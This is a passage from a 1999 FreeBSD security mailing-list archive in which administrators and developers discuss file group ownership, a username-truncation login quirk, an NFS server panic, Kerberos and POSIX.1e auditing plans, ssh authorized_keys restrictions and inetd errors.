<4.2.0.32.19990409184654.045424d0@localhost> from "Brett Glass" at "Apr 9, 1999 7: 9:23 pm" To: brett@lariat.org (Brett Glass) Date: Sat, 10 Apr 1999 02:52:54 -0500 (CDT) Cc: security@freebsd.org X-Mailer: ELM [version 2.4ME+ PL43 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > Is this so? I was under the impression that the default group of a > new file was the login group of the creator, as specified in /etc/passwd. The group by default is the group of the directory. No sgid need to be set on the directory. I've been using this in FreeBSD for a few years. In System V (Irix) - it's different. Just an idea for the secure files transfer - "scp" (ssh) - it allows to to transfer everything securely. ssh can be used to delete the files. Igor To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 10 5:56:30 1999 Delivered-To: freebsd-security@freebsd.org Received: from ppc1.cybertime.ch (ppc1.cybertime.ch [194.191.120.136]) by hub.freebsd.org (Postfix) with ESMTP id 676D914C45 for ; Sat, 10 Apr 1999 05:56:25 -0700 (PDT) (envelope-from pajarola@cybertime.ch) Received: from tiamat.dlc.cybertime.ch (tiamat.dlc.cybertime.ch [194.191.120.143]) by ppc1.cybertime.ch (8.9.2/8.9.2) with SMTP id OAA60354; Sat, 10 Apr 1999 14:54:01 +0200 Message-Id: <3.0.32.19990410144655.00b84ba0@shrike.overmind.ch> X-Sender: pajarola@shrike.overmind.ch X-Mailer: Windows Eudora Pro Version 3.0 (32) Date: Sat, 10 Apr 1999 14:53:50 +0200 To: security@FreeBSD.ORG From: Rico Pajarola Subject: Re: FreeBSD 2.2.8 and DES (again) Cc: Lauro Barbosa Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Tested that on several machines (DES as well as non-DES), 2.2.6, 3.1 and current, and none of them shows this behaviour Only when when the normal username is exactly 8 characters long (or 16 on 3.x and current), it ignores *any* excess characters... eg on current, I have a user called testtesttesttest (16 characters), and I can login as 'testtesttesttest' or as user 'testtesttesttest.' or as user 'testtesttesttestXXXXXXXXXX'. At least OpenBSD 2.3 and AIX4 do this, too. RH Linux 5.2 and SunOS 5.6 don't (or they have much larger username limits, I don't know). Rico >Hello Again! > Please, I need help. > I have a server with FreeBSD 2.2.8 and DES instaled. > In this server the users can to login using login_name or >login_name. >(whit dot at end). for example: john or john. > Anybody know this problem ? > How can to correct this ? > Sorry my poor english. > Thanks, > Lauro. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 10 13:10: 4 1999 Delivered-To: freebsd-security@freebsd.org Received: from posgate.acis.com.au (posgate.acis.com.au [203.14.230.14]) by hub.freebsd.org (Postfix) with ESMTP id D51A515313 for ; Sat, 10 Apr 1999 13:09:47 -0700 (PDT) (envelope-from andymac@bullseye.apana.org.au) Received: from bullseye.apana.org.au (uucp@localhost) by posgate.acis.com.au (8.9.2/8.9.2/Debian/GNU) with UUCP id GAA25216; Sun, 11 Apr 1999 06:02:04 +1000 (EST) Received: from bullseye.apana.org.au (central.apana.org.au [203.9.107.245]) by bullseye.apana.org.au (8.8.8/8.8.8) with SMTP id TAA03022; Sat, 10 Apr 1999 19:10:14 +1000 (EST) (envelope-from andymac@bullseye.apana.org.au) Date: Sat, 10 Apr 1999 19:06:26 +1000 (EST) From: Andrew MacIntyre To: Brett Glass Cc: Wes Peters , security@FreeBSD.ORG Subject: Re: Interesting problem: chowning files sent via FTP In-Reply-To: <4.2.0.32.19990409223443.0451c100@localhost> Message-ID: X-X-Sender: andymac@bullseye.apana.org.au MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Fri, 9 Apr 1999, Brett Glass wrote: > Y'know, it'd be really nice if NFS had "accounts" and "passwords" per se, > but as far as I know the only version that had anything like this was a > proposed "standard" for file transfers that went nowhere. (What was > the name again? I forget.) Would samba provide access authentication closer to the model you desire? IIRC, the client end is "sharity light". -- Andrew I MacIntyre "These thoughts are mine alone..." E-mail: andrew.macintyre@aba.gov.au (work) | Snail: PO Box 370 andymac@bullseye.apana.org.au (play) | Belconnen ACT 2616 Fido: Andrew MacIntyre, 3:620/243.18 | Australia To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sat Apr 10 14: 7:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from point.osg.gov.bc.ca (point.osg.gov.bc.ca [142.32.102.44]) by hub.freebsd.org (Postfix) with ESMTP id 94DEE14C94 for ; Sat, 10 Apr 1999 14:07:36 -0700 (PDT) (envelope-from cy@cschuber.net.gov.bc.ca) Received: (from daemon@localhost) by point.osg.gov.bc.ca (8.8.7/8.8.8) id OAA11768; Sat, 10 Apr 1999 14:07:45 -0700 Received: from da006.inetex.com(139.142.118.21), claiming to be "cwsys.cwsent.com" via SMTP by point.osg.gov.bc.ca, id smtpda11766; Sat Apr 10 14:07:32 1999 Received: (from uucp@localhost) by cwsys.cwsent.com (8.9.3/8.9.1) id NAA45990; Sat, 10 Apr 1999 13:34:32 -0700 (PDT) Message-Id: <199904102034.NAA45990@cwsys.cwsent.com> Received: from localhost.cwsent.com(127.0.0.1), claiming to be "cwsys" via SMTP by localhost.cwsent.com, id smtpdq45986; Sat Apr 10 13:34:30 1999 X-Mailer: exmh version 2.0.2 2/24/98 Reply-To: Cy Schubert - ITSD Open Systems Group From: Cy Schubert - ITSD Open Systems Group X-OS: FreeBSD 2.2.8-RELEASE X-Sender: cy To: sthaug@nethelp.no Cc: brett@lariat.org, ingham@i-pi.com, security@FreeBSD.ORG Subject: Re: Interesting problem: chowning files sent via FTP In-reply-to: Your message of "Sat, 10 Apr 1999 09:17:08 +0200." <31184.923728628@verdi.nethelp.no> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Sat, 10 Apr 1999 13:34:30 -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <31184.923728628@verdi.nethelp.no>, sthaug@nethelp.no writes: > > Is this so? I was under the impression that the default group of a > > new file was the login group of the creator, as specified in /etc/passwd. > > AFAIK, in all BSD versions the default group of a new file is the group > of the directory it is created in. > > > As for the setgid-on-execution bit: there's no documentation on what it > > does when set on a directory. The chmod(1) man page doesn't say anything. > > Does it change the group ownership of newly created files? > > setgid on a directory is a SYSV-ism (or rather, close to a SVR4-ism). It > means that the SYSV system in question should follow the BSD semantics > for files created in this directory, instead of the default SYSV semantics > (set the group of the file to the effective gid of the creating process). The SVR4-ism is there because SYSV does not conform to FIPS-151. FIPS-151 states BSD semantics must be used for newly created files and directories. FIPS-151 is a US Government standard, if not adhered to by a vendor, the said system cannot be purchased by agencies of the US government. That's why SVR4 uses the sgid bit for for directories, to conform to FIPS-151. It's all described in Stevens' book on Advanced UNIX Programming. > > setgid on a directory works this way at least in Solaris 2 and HP-UX 10.x/ > 11.x. Regards, Phone: (250)387-8437 Cy Schubert Fax: (250)387-5766 Open Systems Group Internet: Cy.Schubert@uumail.gov.bc.ca ITSD Cy.Schubert@gems8.gov.bc.ca Province of BC "e**(i*pi)+1=0" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 11 0: 6:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from apollo.backplane.com (apollo.backplane.com [209.157.86.2]) by hub.freebsd.org (Postfix) with ESMTP id DE1E714F4A; Sun, 11 Apr 1999 00:06:14 -0700 (PDT) (envelope-from dillon@apollo.backplane.com) Received: (from dillon@localhost) by apollo.backplane.com (8.9.3/8.9.1) id AAA03493; Sun, 11 Apr 1999 00:03:49 -0700 (PDT) (envelope-from dillon) Date: Sun, 11 Apr 1999 00:03:49 -0700 (PDT) From: Matthew Dillon Message-Id: <199904110703.AAA03493@apollo.backplane.com> To: "David E. Cross" Cc: freebsd-hackers@FreeBSD.ORG, freebsd-security@FreeBSD.ORG Subject: Re: increased crashing in NFS server References: <199904110341.XAA17071@cs.rpi.edu> Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org :I recently updated all of our FreeBSD3 clients to use NFSv3/UDP when :contacting our servers (FreeBSD3 of the same build tree). We have :noticed an increase in crashing of our main home directory server :(which is the only server really handling RW mounts, our other servers :are mostly RO, with some minor RW activity.) The first crash was :obviously NFS. I traced it to one of 2 possible crash points in the :kernel (sorry, no stack trace, we don't [yet] have a crashlogs enabled :for that machine.). : :The panic was: :mbuf siz=33476 :panic: Bad nfs svc reply You are using a 32K file block size? If so, reduce it to 8K. I think you've just shown us a security hole in the NFS system -- it panics if it is given too large a response packet. Oops. It should just print a message and drop the packet. :The second panic just happened, it claims to be softupdate related. I :think it may have something to do with NFSv3 however since this machine :used to be very stable (ie, not 2 crashes in a week). : :This panic was: :panic: softdep_write_inodeblock: indirect pointer #0 mismatch 0 != 102192 :8 :syncing disks... panic: softdep_lock: locking against myself :... : The Regents of the University of California. All rights reserved. :FreeBSD 3.1-STABLE #0: Sun Mar 21 02:23:19 EST 1999 : schimken@wobble.cs.rpi.edu:/usr/src/sys/compile/STAGGER :... :David Cross | WinNT:Linux::Linux:FreeBSD This is when you built it. When did you check the source out of the CVS tree? There have been a few commits in this area since Mar 21st, you definitely want to update your sources, but I don't think any of the commits address the above softupdates panic. I've never seen that panic before. I recommend fsck'ing all your filesystems from single-user just in case there's some garbage in there. -Matt Matthew Dillon To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 11 16: 2:51 1999 Delivered-To: freebsd-security@freebsd.org Received: from gratis.grondar.za (gratis.grondar.za [196.7.18.65]) by hub.freebsd.org (Postfix) with ESMTP id 8E05117936; Sun, 11 Apr 1999 15:51:26 -0700 (PDT) (envelope-from mark@greenpeace.grondar.za) Received: from greenpeace.grondar.za (greenpeace.grondar.za [196.7.18.132]) by gratis.grondar.za (8.9.2/8.9.2) with ESMTP id NAA01660; Sun, 11 Apr 1999 13:44:43 +0200 (SAST) (envelope-from mark@greenpeace.grondar.za) Received: from greenpeace.grondar.za (localhost [127.0.0.1]) by greenpeace.grondar.za (8.9.3/8.9.3) with ESMTP id NAA73219; Sun, 11 Apr 1999 13:44:00 +0200 (SAST) (envelope-from mark@greenpeace.grondar.za) Message-Id: <199904111144.NAA73219@greenpeace.grondar.za> To: Matthew Dillon Cc: Robert Watson , Eivind Eklund , Sheldon Hearn , Mike Thompson , Gary Gaskell , freebsd-security@freebsd.org Subject: Re: Kerberos vs SSH In-Reply-To: Your message of " Thu, 25 Mar 1999 10:38:41 PST." <199903251838.KAA01021@apollo.backplane.com> References: <199903251838.KAA01021@apollo.backplane.com> Date: Sun, 11 Apr 1999 13:43:45 +0200 From: Mark Murray Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Matthew Dillon wrote: > :Any chance of K5 becoming the default version of kerberos distributed with > :FreeBSD sometime? :-) > : > : Robert N Watson > > I would second this request. We've been using KRB5 for almost a year now I have it commit ready - waiting for PAM to mature and also watching Heimdal's progress. Reading this list after a long layoff :-) M -- Mark Murray Join the anti-SPAM movement: http://www.cauce.org To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 11 16:29:38 1999 Delivered-To: freebsd-security@freebsd.org Received: from cs.rpi.edu (mumble.cs.rpi.edu [128.213.8.16]) by hub.freebsd.org (Postfix) with ESMTP id 4BA0015C37; Sun, 11 Apr 1999 16:06:51 -0700 (PDT) (envelope-from crossd@cs.rpi.edu) Received: from cs.rpi.edu (monica.cs.rpi.edu [128.213.7.2]) by cs.rpi.edu (8.9.1/8.9.1) with ESMTP id MAA24421; Sun, 11 Apr 1999 12:00:09 -0400 (EDT) Message-Id: <199904111600.MAA24421@cs.rpi.edu> To: Matthew Dillon Cc: "David E. Cross" , freebsd-hackers@freebsd.org, freebsd-security@freebsd.org, schimken@cs.rpi.edu Subject: Re: increased crashing in NFS server In-Reply-To: Message from Matthew Dillon of "Sun, 11 Apr 1999 00:03:49 PDT." <199904110703.AAA03493@apollo.backplane.com> Date: Sun, 11 Apr 1999 12:00:04 -0400 From: "David E. Cross" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > :I recently updated all of our FreeBSD3 clients to use NFSv3/UDP when > :contacting our servers (FreeBSD3 of the same build tree). We have > :noticed an increase in crashing of our main home directory server > :(which is the only server really handling RW mounts, our other servers > :are mostly RO, with some minor RW activity.) The first crash was > :obviously NFS. I traced it to one of 2 possible crash points in the > :kernel (sorry, no stack trace, we don't [yet] have a crashlogs enabled > :for that machine.). > : > :The panic was: > :mbuf siz=33476 > :panic: Bad nfs svc reply > > You are using a 32K file block size? If so, reduce it to 8K. > > I think you've just shown us a security hole in the NFS system -- it > panics if it is given too large a response packet. Oops. It should > just print a message and drop the packet. We are using AMD, so I have no idea what size it is using. I will again say that it would be really nice to be able to query the full mount options. I have tried statfs(2), but it does not seem to have what I want. I will tell amd to use rsize/wsize of 8192 to force the issue. It is becoming slightly annoying that amd would cdefault to unstable options ;) > :The second panic just happened, it claims to be softupdate related. I > :think it may have something to do with NFSv3 however since this machine > :used to be very stable (ie, not 2 crashes in a week). > : > :This panic was: > :panic: softdep_write_inodeblock: indirect pointer #0 mismatch 0 != 102192 > :8 > :syncing disks... panic: softdep_lock: locking against myself > :... > : The Regents of the University of California. All rights reserved. > :FreeBSD 3.1-STABLE #0: Sun Mar 21 02:23:19 EST 1999 > : schimken@wobble.cs.rpi.edu:/usr/src/sys/compile/STAGGER > :... > > This is when you built it. When did you check the source out of the CVS > tree? > > There have been a few commits in this area since Mar 21st, you definitely > want to update your sources, but I don't think any of the commits address > the above softupdates panic. I've never seen that panic before. > > I recommend fsck'ing all your filesystems from single-user just in case > there's some garbage in there. Ok, we will do all of that when we can schedule a convienient downtime. The sources were checked out arround noon, Fri, Mar 26. Is it possibly a NFS3/Softupdates problem? All the exported filesystems on that drive are softupdate mounted, and the only access to that filesystem is via NFS. -- David Cross | WinNT:Linux::Linux:FreeBSD Systems Administrator/Research Programmer | Rensselaer Polytechnic Institute, | This space intentionally Department of Computer Science | left unblank I speak only for myself. | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 11 16:29:37 1999 Delivered-To: freebsd-security@freebsd.org Received: from cs.rpi.edu (mumble.cs.rpi.edu [128.213.8.16]) by hub.freebsd.org (Postfix) with ESMTP id 374AC15612; Sun, 11 Apr 1999 16:06:51 -0700 (PDT) (envelope-from crossd@cs.rpi.edu) Received: from cs.rpi.edu (monica.cs.rpi.edu [128.213.7.2]) by cs.rpi.edu (8.9.1/8.9.1) with ESMTP id NAA25039; Sun, 11 Apr 1999 13:10:30 -0400 (EDT) Message-Id: <199904111710.NAA25039@cs.rpi.edu> To: freebsd-hackers@freebsd.org Cc: crossd@cs.rpi.edu, freebsd-security@freebsd.org, schimken@cs.rpi.edu Subject: Re: increased crashing in NFS server In-Reply-To: Message from Matthew Dillon of "Sun, 11 Apr 1999 00:03:49 PDT." <199904110703.AAA03493@apollo.backplane.com> Date: Sun, 11 Apr 1999 13:10:30 -0400 From: "David E. Cross" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > : The Regents of the University of California. All rights reserved. > :FreeBSD 3.1-STABLE #0: Sun Mar 21 02:23:19 EST 1999 > : schimken@wobble.cs.rpi.edu:/usr/src/sys/compile/STAGGER > :... > :David Cross | WinNT:Linux::Linux:FreeBSD > > This is when you built it. When did you check the source out of the CVS > tree? As was pointed out to me (and sent to Matt). A checkout on the 26th would not have been possible. It was checked out on the previous Friday, the 19th. -- David Cross | WinNT:Linux::Linux:FreeBSD Systems Administrator/Research Programmer | Rensselaer Polytechnic Institute, | This space intentionally Department of Computer Science | left unblank I speak only for myself. | To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 11 18:41:41 1999 Delivered-To: freebsd-security@freebsd.org Received: from guepardo.vicosa.com.br (guepardo.tdnet.com.br [200.236.148.6]) by hub.freebsd.org (Postfix) with ESMTP id 89D0D14E21 for ; Sun, 11 Apr 1999 18:41:34 -0700 (PDT) (envelope-from kernel@tdnet.com.br) Received: from tdnet.com.br [200.236.148.204] by guepardo.vicosa.com.br with ESMTP (SMTPD32-5.00) id A06140E00E2; Sun, 11 Apr 1999 22:46:09 -0300 Message-ID: <37114F00.4746742C@tdnet.com.br> Date: Sun, 11 Apr 1999 22:40:16 -0300 From: User Grios X-Mailer: Mozilla 4.05 [en] (X11; I; FreeBSD 2.2.8-STABLE i386) MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: list security Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have a very simple questions: How can i limit user post to a mailing list, for instance: only user xxxx@secure.host from IP ADDRESS aaa.bbb.ccc.ddd can post messages to the list! Is that possible? My mail server is qmail and my list manager is EZMLM! Thank you for your time and cooperation. PS: here goes my uname -a output (/etc/motd asked me to send this info) FreeBSD etosha 2.2.8-STABLE FreeBSD 2.2.8-STABLE #0: Tue Apr 6 23:34:08 EST 1999 toor@etosha:/usr/src/sys/compile/ETOSHA i386 To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Sun Apr 11 18:52: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from shemp.palomine.net (shemp.palomine.net [205.198.88.200]) by hub.freebsd.org (Postfix) with SMTP id 8B85A14FC0 for ; Sun, 11 Apr 1999 18:51:55 -0700 (PDT) (envelope-from cjohnson@palomine.net) Received: (qmail 18988 invoked by uid 1000); 12 Apr 1999 01:49:38 -0000 Date: Sun, 11 Apr 1999 21:49:38 -0400 From: Chris Johnson To: User Grios Cc: freebsd-security@freebsd.org Subject: Re: list security Message-ID: <19990411214938.A18980@palomine.net> References: <37114F00.4746742C@tdnet.com.br> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95.4i In-Reply-To: <37114F00.4746742C@tdnet.com.br>; from User Grios on Sun, Apr 11, 1999 at 10:40:16PM -0300 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Sun, Apr 11, 1999 at 10:40:16PM -0300, User Grios wrote: > I have a very simple questions: > How can i limit user post to a mailing list, for instance: > only user xxxx@secure.host from IP ADDRESS aaa.bbb.ccc.ddd can post > messages to the list! > > Is that possible? > > My mail server is qmail and my list manager is EZMLM! It's probably possible, if you want to hack the code. You'll probably have better luck with this question on the ezmlm mailing list: ezmlm@list.cr.yp.to. Chris To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 5:47:33 1999 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.40.153]) by hub.freebsd.org (Postfix) with ESMTP id A65741511B for ; Mon, 12 Apr 1999 05:47:26 -0700 (PDT) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.40.131]) by phk.freebsd.dk (8.9.1/8.8.8) with ESMTP id OAA16921; Mon, 12 Apr 1999 14:45:08 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (localhost [127.0.0.1]) by critter.freebsd.dk (8.9.2/8.9.2) with ESMTP id LAA00388; Thu, 8 Apr 1999 11:08:52 +0200 (CEST) (envelope-from phk@critter.freebsd.dk) To: Robert Watson Cc: freebsd-security@FreeBSD.ORG Subject: Re: POSIX.1E auditing support, an initial pass and some questions In-reply-to: Your message of "Mon, 05 Apr 1999 13:56:41 EDT." Date: Thu, 08 Apr 1999 11:08:52 +0200 Message-ID: <386.923562532@critter.freebsd.dk> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi Robert, It sounds to me like you will be overlapping with KTRACE to a great extent, have you considered unification of the two ? Certainly your stuff can do anything that KTRACE can, so if anything we should be able to get rid of KTRACE if we adopt your stuff. There is also some overlap with process-accounting come to think of it. There is no easy way to get all args to all syscalls, they're too unsystematic for that. Have you considered to do (some of) the filtering in the kernel in a manner like bpf ? This would reduce the performance impact. I would also love to have a remote audit ability where the audit records are never passed into userland on the audited machine, but instead shipped over a network (or other interface) to a monitor box. Keep at it! -- Poul-Henning Kamp FreeBSD coreteam member phk@FreeBSD.ORG "Real hackers run -current on their laptop." FreeBSD -- It will take a long time before progress goes too far! To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 6:45:42 1999 Delivered-To: freebsd-security@freebsd.org Received: from fledge.watson.org (fledge.watson.org [204.156.12.50]) by hub.freebsd.org (Postfix) with ESMTP id F421014E24 for ; Mon, 12 Apr 1999 06:45:33 -0700 (PDT) (envelope-from robert@cyrus.watson.org) Received: from fledge.watson.org (robert@fledge.pr.watson.org [192.0.2.3]) by fledge.watson.org (8.8.8/8.8.8) with SMTP id JAA18572; Mon, 12 Apr 1999 09:39:31 -0400 (EDT) (envelope-from robert@cyrus.watson.org) Date: Mon, 12 Apr 1999 09:39:31 -0400 (EDT) From: Robert Watson X-Sender: robert@fledge.watson.org Reply-To: Robert Watson To: Poul-Henning Kamp Cc: freebsd-security@FreeBSD.ORG Subject: Re: POSIX.1E auditing support, an initial pass and some questions In-Reply-To: <386.923562532@critter.freebsd.dk> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Thu, 8 Apr 1999, Poul-Henning Kamp wrote: > It sounds to me like you will be overlapping with KTRACE to a great > extent, have you considered unification of the two ? Certainly your > stuff can do anything that KTRACE can, so if anything we should > be able to get rid of KTRACE if we adopt your stuff. There is also > some overlap with process-accounting come to think of it. I thought about this briefly, and later received email from Nate on the same topic. I agree that, if possible, we should have one mechanism for generating traces, optionally formatted as audit records. The audit mechanism doesn't trace things like signals or care about a number of other events. My temptation would be to go for an modified KTRACE as it's already in place and (presumably) moderately efficient, and then have a funneling module that converts the KTRACE data into an audit record format, or more extensive process trace format. The auditing data defined by POSIX.1e is limited to user-requests that the POSIX folk considered the be relevant--i.e., brk()/sbrk() aren't there, but open() is. They allow for local extension as needed, but holding to their philosophy is probably useful. Also, defining a set which is useful for other camps (*BSD, linux, etc) is probably a good idea so portability can be maximized. > There is no easy way to get all args to all syscalls, they're too > unsystematic for that. I had suspected (and observed) as much. What is the rational behind having the name lookup pull the pathname into the kernel as opposed to using a copyin in the syscall and passing it in as an argument? Presumably someone, somewhere has to allocate space on the stack, and if it's done in the syscall function then more argument processing is done in one place? This would make at least a bit more available to an auditing layer in the syscall. > Have you considered to do (some of) the filtering in the kernel > in a manner like bpf ? This would reduce the performance impact. Yes. Once the kernel interface issue was sorted out, I had plans for at least a rudimentary mask functionality, although having something stronger (ie, bpf) would certainly be better. The mask I had in mind was something on the order of a set of processes interesting an audit record customer, and then a mask of event types (mappable fairly directly to syscalls, etc). Right now I have it configured so there is only one consumer sitting on a queue attached to /dev/audit. My intent there was to have auditd process as necessary, and then provide records to other consumers by way of IPC or dynamic linking of IDS modules into auditd and a standard access API. > I would also love to have a remote audit ability where the audit > records are never passed into userland on the audited machine, > but instead shipped over a network (or other interface) to a > monitor box. That would certainly be possible, and would definitely be useful :-). I didn't have plans for this in the pipeline, but that could be a great feature. Of course, the pipeline trails off a little at this point because of the "intergrate into the kernel" issue :-). Presumably one could optionally also throw in the use of a one-way hash for speedy authentication by shared secret. I would think putting public key support in would belong in a user-land daemon until the kernel is preemptible, and also be batched. I'm not sure if you've had a chance to look at the POSIX.1e draft or my man pages for it. The man pages are online on by POSIX.1e page as part of the tarball containing the first pass. The API is completely documented, but I still have to document the audit event types and what they expect to be reported. Robert N Watson robert@fledge.watson.org http://www.watson.org/~robert/ PGP key fingerprint: 03 01 DD 8E 15 67 48 73 25 6D 10 FC EC 68 C1 1C Carnegie Mellon University http://www.cmu.edu/ TIS Labs at Network Associates, Inc. http://www.tis.com/ Safeport Network Services http://www.safeport.com/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 8:18:45 1999 Delivered-To: freebsd-security@freebsd.org Received: from satsuma.mail.easynet.net (satsuma.mail.easynet.net [195.40.1.44]) by hub.freebsd.org (Postfix) with ESMTP id 79E4115174 for ; Mon, 12 Apr 1999 08:18:41 -0700 (PDT) (envelope-from max@ukonline.net) Received: from bell.ukonline.co.uk ([195.40.119.5] helo=ukonline.net) by satsuma.mail.easynet.net with esmtp (Exim 2.12 #1) id 10WiRj-0007Yn-00 for freebsd-security@freebsd.org; Mon, 12 Apr 1999 16:16:23 +0100 Message-ID: <37120E9B.1AE1FD8D@ukonline.net> Date: Mon, 12 Apr 1999 16:17:47 +0100 From: Max Booth Organization: UK Online Ltd X-Mailer: Mozilla 4.5 [en] (X11; I; FreeBSD 3.0-RELEASE i386) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: inetd problems Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hi all, Reciently, since the load on one of our FreeBSD 3.0 systems has been increasing I keep on getting the following errors when attempting connections to the system: Escape character is '^]'. inetd in realloc(): warning: junk pointer, too low to make sense. inetd in free(): warning: junk pointer, too low to make sense. Connection closed by foreign host. The only thing using inetd now is telnetd, so I can't emagine that it's due to inetd being under too much preassure. Has anyone else experienced this problem? Thanks in advance, apologies if this is the wrong list. Regards, max -- Max Booth Systems Developer for UK Online Ltd http://www.ukonline.co.uk/ Email: max@ukonline.net "Believing oneself to be perfect is often the sign of a delusional mind" To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 8:50: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from dazed.slacker.com (dazed.slacker.com [208.15.208.76]) by hub.freebsd.org (Postfix) with SMTP id E3BCA14ECC for ; Mon, 12 Apr 1999 08:49:49 -0700 (PDT) (envelope-from fbsdlist@dazed.slacker.com) Received: (qmail 62709 invoked by uid 1012); 12 Apr 1999 15:47:29 -0000 Date: Mon, 12 Apr 1999 10:47:29 -0500 From: David McNett To: freebsd-security@freebsd.org Subject: Re: ssh and scp Message-ID: <19990412104729.A62365@dazed.slacker.com> References: <199904080936.TAA11475@atdot.dotat.org> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 0.95i In-Reply-To: ; from Bruce Campbell on Fri, Apr 09, 1999 at 10:26:24AM +1000 X-Operating-System: FreeBSD 3.1-STABLE i386 X-Distributed: Join the Effort! http://www.distributed.net Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On 09-Apr-1999, Bruce Campbell wrote: > Works for me, although I'll admit to being a bit shy of null-password RSA > keys, which can be alleviated somewhat by restricting which hosts can use > which keys. Actually the level of restriction can be much more granular than simply permitting and denying on a host-by-host basis. The sshd manpage has considerable detail on this under the subheading AUTHORIZED_KEYS FILE FORMAT. In addition to specifying valid remote hosts on a key basis, one can also restricte a keypair to a single command with the "command=" directive. In this way you can prohibit the null-passphrase RSA key to a single task and not worry about an open shell if the keypair is compromised. While any null-passphrase situation is by definition an open door, you can at least limit the scope of the activity that compromise permits. from="trust.slacker.com" no-pty no-agent-forwarding no-X11-forwarding no-port-forwarding command="/home/luser/bin/only_this_command" 1024 35 1385747740706965662979092265453243173821775069593500592656102528164588 1458968562818828612328348480183921191882598263470247545000152074356254 7885213846674971276953111134546999143676911041828605560207201262339416 9160927998516632223127781986085086932733750776793503721007278947326141 39818692207780079452547982359 null passphrase key To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Apr 12 9:15: 2 1999 Delivered-To: freebsd-security@freebsd.org Received: from eagle.aitken.com (eagle.aitken.com [209.249.97.250]) by hub.freebsd.org (Postfix) with ESMTP id 6D55215585 for ; Mon, 12 Apr 1999 09:14:59 -0700 (PDT) (envelope-from jaitken@aitken.com) Received: (from jaitken@localhost) by eagle.aitken.com (8.9.1a/8.9.1) id MAA01726; Mon, 12 Apr 1999 12:12:37 -0400 From: Jeff Aitken Message-Id: <199904121612.MAA01726@eagle.aitken.com> Subject: Re: inetd problems In-Reply-To: <37120E9B.1AE1FD8D@ukonline.net> from Max Booth at "Apr 12, 1999 04:17:47 pm" To: max@ukonline.net (Max Booth) Date: Mon, 12 Apr 1999 12:12:36 -0400 (EDT) Cc: freebsd-security@FreeBSD.ORG X-Mailer: ELM [version 2.4ME+ PL53 (25)] Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Max Booth writes: > Escape character is '^]'. > inetd in realloc(): warning: junk pointer, too low to make sense. > inetd in free(): warning: junk pointer, too low to make sense. > Connection closed by foreign host. I've seen this before, on a 2.2.6 system. IIRC, the answer 